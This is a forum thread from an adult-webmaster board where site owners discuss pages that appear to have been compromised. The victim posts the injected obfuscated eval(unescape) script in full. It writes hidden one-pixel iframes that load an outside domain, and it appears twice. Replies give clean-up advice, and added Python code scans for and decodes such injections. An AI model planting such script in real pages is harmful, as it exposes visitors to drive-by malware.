GoFuckYourself.com - Adult Webmaster Forum


tehHinjew 11-24-2007 07:57 PM

so those viruses on my tgp are back... anyone else?
 
<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e %77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%7 2%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79% 64%65%6c%65%74%65%2e%63%6f%6d%2f%73%74%72%6f%6e%67 %2f%30%35%30%2f%20%77%69%64%74%68%3d%31%20%68%65%6 9%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27% 29%3b'));</script>
<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e %77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%7 2%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79% 64%65%6c%65%74%65%2e%63%6f%6d%2f%64%6c%2f%6e%65%77 %6e%65%77%2e%70%68%70%3f%61%64%76%3d%35%30%20%77%6 9%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c% 2f%69%66%72%61%6d%65%3e%27%29%3b'));</script>

hosted at webair, i have 0 scripts

any one else?:Oh crap

tehHinjew 11-24-2007 07:59 PM

http://www.google.ca/search?source=i...e+Search&meta=

justFred 11-24-2007 08:20 PM

Quote:

Originally Posted by tehHinjew (Post 13416273)

:eyecrazy:eek7:eek2

MoreMagic 11-25-2007 12:08 AM

Let me guess cpanel?

SmokeyTheBear 11-25-2007 01:01 AM

Quote:

Originally Posted by MoreMagic (Post 13416849)
Let me guess cpanel?

I doubt it, webair doesn't use cpanel by default, I don't think

starpimps 11-25-2007 01:15 AM

thanks for the heads up...checked some sites
and i got the same code

files modified on nov19th =\

hjnet 11-25-2007 01:42 AM

Your server got hacked. A good idea would be to check your site's files for recently changed or newly added files; you can also do that through FTP.

And through SSH you could take a look at what recently happened on your server with the "last" command.

Oh and update your box :)
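The check suggested above (look for recently changed or newly added files), sketched as an added example that is not part of the original thread. The marker regex is the `eval(unescape(` wrapper from the first post; the function name, extension list and size limit are assumptions chosen for illustration.

```python
import os
import re
import stat

# Wrapper used by the injected snippet quoted in this thread.
MARKER = re.compile(rb"eval\s*\(\s*unescape\s*\(")
WEB_EXTS = (".html", ".htm", ".shtml", ".php", ".js")  # assumed list


def triage(root, since_epoch, max_bytes=2_000_000):
    """Walk a web root; report files changed since `since_epoch` or carrying the marker.

    Returns sorted (relative_path, changed_recently, has_marker) tuples.
    """
    findings = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
                if not stat.S_ISREG(st.st_mode):
                    continue  # skip symlinks, sockets, devices
                recent = st.st_mtime >= since_epoch
                marked = False
                if name.lower().endswith(WEB_EXTS):
                    with open(path, "rb") as fh:
                        marked = bool(MARKER.search(fh.read(max_bytes)))
            except OSError:
                continue  # unreadable file: skip rather than abort the sweep
            # mtime can be reset by whoever modified the file, so a content
            # hit is reported even when the timestamp looks old.
            if recent or marked:
                findings.append((os.path.relpath(path, root), recent, marked))
    return sorted(findings)
```

Files that are recent but unmarked still deserve a look, since they may be newly added rather than modified pages.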

V_RocKs 11-25-2007 01:53 AM

Webair has problems....

Zester 11-25-2007 05:46 AM

use this encoder/decoder:
http://d21c.com/sookietex/ASCII2HEX.html

Zester 11-25-2007 05:48 AM

here it is decoded:
PHP Code:

documentwrite('<iframe s%7 2c=http://softspy% 64elete.com/strong /050/ width=1 he%6 9ght=1></iframe>'); 

I fucked it up a little but you get the picture...
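The decode above is garbled because the forum's word-wrap split some `%xx` escapes with spaces (for example `%7 2`). The following added example, which is not code from the thread, decodes such a snippet statically, without running it, and reports any 1-pixel iframe it would write. The function names and the sample payload (placeholder host) are constructed for illustration, and `%uXXXX` escapes are not handled.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# The wrapper seen in the thread: eval(unescape('...'))
WRAPPER = re.compile(r"eval\s*\(\s*unescape\s*\(\s*(['\"])(.*?)\1\s*\)\s*\)", re.S)

class IframeCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.found.append(dict(attrs))

def decode_payloads(html):
    """Decode each eval(unescape('...')) argument as text; nothing is executed."""
    decoded = []
    for match in WRAPPER.finditer(html):
        # Assumption: every byte is %xx-escaped (true of the posted snippet), so raw
        # whitespace was added by the forum's word-wrap ("%7 2") and can be dropped.
        packed = re.sub(r"\s+", "", match.group(2))
        decoded.append(unquote(packed, encoding="latin-1"))
    return decoded

def hidden_iframes(html):
    """List iframes written by the decoded payloads, flagging 0/1-pixel ones."""
    report = []
    for js in decode_payloads(html):
        parser = IframeCollector()
        parser.feed(js)
        parser.close()
        for attrs in parser.found:
            tiny = all((attrs.get(k) or "").strip() in ("0", "1")
                       for k in ("width", "height"))
            report.append({"src": attrs.get("src"), "hidden": tiny})
    return report

def make_sample(js, every=17):
    """Constructed input: escape every byte, then break it with spaces as the forum did."""
    enc = "".join("%%%02x" % b for b in js.encode("latin-1"))
    broken = " ".join(enc[i:i + every] for i in range(0, len(enc), every))
    return "<script>eval(unescape('%s'));</script>" % broken

# Constructed payload with a placeholder host, not the one from the thread.
SAMPLE_JS = ("document.write('<iframe src=http://injected.example.invalid/a/ "
             "width=1 height=1></iframe>');")
SAMPLE = make_sample(SAMPLE_JS)

if __name__ == "__main__":
    print(hidden_iframes(SAMPLE))
```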

Pornopat 11-25-2007 05:52 AM

Delete all php files from your server and then start cleaning up the mess with a code that represses.

Spudman 11-25-2007 05:53 AM

I had this problem, got rid of it recently and I'm still ok at the moment, I'm with webair too.

Scootermuze 11-25-2007 06:57 AM

I get them on occasion...

I've cleaned up, changed passwords, removed all php, and still have them show up now and then...

The php I did use were just single file parser scripts..

Anyone know of a way to restrict ftp access to a given ip address?

directfiesta 11-25-2007 08:19 AM

Quote:

Originally Posted by Scootermuze (Post 13417461)

Anyone know of a way to restrict ftp access to a given ip address?

firewall

directfiesta 11-25-2007 08:20 AM

Quote:

Originally Posted by MoreMagic (Post 13416849)
Let me guess cpanel?

wrong ...... another guess?

Zester 11-25-2007 08:33 AM

what do you guys mean "remove all php files"? how is this related to php?

Evil E 11-25-2007 08:38 AM

Are you on a dedicated box?

Evil E 11-25-2007 08:40 AM

http://64.233.167.104/search?q=cache...nk&cd=10&gl=ca

Evil E 11-25-2007 09:00 AM

I hope webair are looking into this problem with you, because there might be some weird/illegal activities going on right now...

http://www.honeynet.org.cn/downloads...etworks_EC.htm

hjnet 11-25-2007 09:17 AM

Quote:

Originally Posted by Scootermuze (Post 13417461)
I get them on occasion...

I've cleaned up, changed passwords, removed all php, and still have them show up now and then...

The php I did use were just single file parser scripts..

Anyone know of a way to restrict ftp access to a given ip address?

I'd guess the person who did it used a proxy, but search google for "IPTables" or "hosts.deny"

Zester 11-25-2007 09:39 AM

bbbbbbbump

Sosa 11-25-2007 10:36 AM

that sucks for you

'So Fucking Money 12-14-2007 11:17 AM

Yeah, webair has been beginning to suck. Who is the webair replacement?

Adultnet 12-14-2007 11:20 AM

yeah not good.. good luck with resolving this...

sortie 12-14-2007 11:31 AM

Quote:

Originally Posted by tehHinjew (Post 13416268)
<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e %77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%7 2%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79% 64%65%6c%65%74%65%2e%63%6f%6d%2f%73%74%72%6f%6e%67 %2f%30%35%30%2f%20%77%69%64%74%68%3d%31%20%68%65%6 9%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27% 29%3b'));</script>
<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e %77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%7 2%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79% 64%65%6c%65%74%65%2e%63%6f%6d%2f%64%6c%2f%6e%65%77 %6e%65%77%2e%70%68%70%3f%61%64%76%3d%35%30%20%77%6 9%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c% 2f%69%66%72%61%6d%65%3e%27%29%3b'));</script>

hosted at webair, i have 0 scripts

any one else?:Oh crap

You should ask them if they have the latest version of SSH installed on their servers. There is a version of SSH that could be flooded and allow a hacker to login to the server. This was fixed, but if a web host is still using the old version then the problem is there.

Wiredoctor 12-14-2007 06:24 PM

Once your server gets compromised like this the only 100% fail-safe way to get it back is to format it, and make sure your host knows how to firewall it this time. This should never or very rarely happen if the server is being managed properly. :2 cents:

Evil E 12-14-2007 06:56 PM

If still not fixed, you have to check which scripts you run on your server and if any of those scripts versions are vulnerable to known exploits.

The Judge 12-14-2007 07:36 PM

But does your antivirus detect it when you load your page? If not then it is something way more evil (undetectable Russian rootkit)


All times are GMT -7.